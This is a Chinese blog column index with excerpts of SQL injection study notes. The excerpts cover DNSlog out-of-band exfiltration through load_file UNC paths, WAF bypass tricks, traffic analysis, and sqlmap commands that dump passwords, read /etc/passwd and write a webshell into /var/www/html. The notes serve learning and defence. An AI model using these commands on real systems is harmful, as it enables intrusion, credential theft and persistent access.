MySQL
文章平均质量分 85
sql
墨染 殇雪
热爱网络安全技术,熟悉渗透测试,漏洞分析与防御,熟练使用BurpSuite,sqlmap,蚁剑等工具。持有CISP系列证书。
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
SQL注入无回显,盲注被封怎么办?
(需要将load_file的路径拼出来)利用unc机制向指定网络这些并带回敏感资源,利用dnslog的dns解析日志将敏感信息放入我们的三级域名里面,\\\\是\\,敏感信息是version(),然后拼接dnslog.cn的二级域名.2g7sst.dnslog.cn(看平台中所申请的域名),\\test是文件名可有可无(利用load_file向数据库中去写日志,但高版本的MySQL需要先开启secure_file_priv权限)2、UNC路径不能超过128,否则报错,这限制了比如sgl的查询语句的长度。原创 2025-08-29 19:57:52 · 1053 阅读 · 0 评论 -
SQL手工注入及流量分析
源码中从$_GET['id']处获得了id信息(进行删除数据时是以条目形式删除),而sql语句中可以看出delete from message where id={$_GET['id']}内容是直接从$_GET['id']获得没有做任何处理,而且该id还是一个数值型内容(没有单引号引起来)在SQL中,分号(:)是用来表示一条sq1语句的结束。‘(x后的单引号闭合前单引号,or后的单引号闭合后单引号)注意,对于insert注入不能使用注释(--+ #)去注释掉后面内容,只能使用and或or去进行单引号闭合。原创 2025-08-28 19:09:01 · 656 阅读 · 0 评论 -
注入流量分析
也是concat(~,(select @@version),~)方式进行拼接中间为敏感信息,用or '1'='1去闭合另一个单引号(在and前有一个单引号会分割原数据库中的单引号,and前闭合前单引号,or这闭合后单引号)存在count()、floor()、rand()、group by内容也可能有union select,但union select是没有回显信息的,这里是因为加上了floor才带回了回显信息。rand(),然后再由groupby将计算出来的主键直接插入到临时表格中,导致主键重复报错,原创 2025-08-18 20:49:49 · 766 阅读 · 0 评论 -
SQL注入绕过笔记
靶机的防守方式有两种一种是WAF另一种是在代码开发时添加代码对用户输入进行过滤数据库绕过基础:1、Mysql中的大小写不敏感,大写与小写一样。2、MysqI中的十六进制与URL编码。3、符号和关键字替换and--&&、or--||4、内联注释与多行注释/*!内联注释*|*多行注释*/5、MysqI中会自动识别URL与Hex编码好的内容(url编码代替空格)。原创 2025-08-17 18:03:23 · 618 阅读 · 0 评论 -
SQL注入笔记2
如文本框类便不能再使用--+进行注释换用#进行注释,若还有前端过滤则可以使用BP抓包,其它注入方式与Get型注入差不多,若不想不通过前端发送或前端进行了限制可以使用BP抓包更改uname值使用sqlmap进行post注入测试,与get不同于post使用-r+文件路径(BP抓到的请求包内容复制到新建文件中,这里路径指自己新建的文件路径如:C:/桌面/xx.txt) -p+指定探测参数命令1测试参数passwd是否是注入点(linux)原创 2025-08-05 22:42:27 · 836 阅读 · 0 评论 -
SQL注入随堂笔记
id=1” -D security -T users -C username, password --dump --batch(-D是DB,-T为table,-C为column,对库,表,字段进行指定),这样便获取到了用户名及密码。id=1" --file-write '/ma.php' --file-dest '/var/www/html/ma1.php' --batch(再用菜刀等工具链接即可)id=1" --file-read /etc/passwd' --batch(读取后的文件存于该路径下)原创 2025-08-04 20:46:20 · 905 阅读 · 0 评论 -
关于mysql connector net没删干净导致的无法安装MySQL
关于mysql connector net无法删除原创 2022-12-12 22:17:51 · 2157 阅读 · 2 评论
分享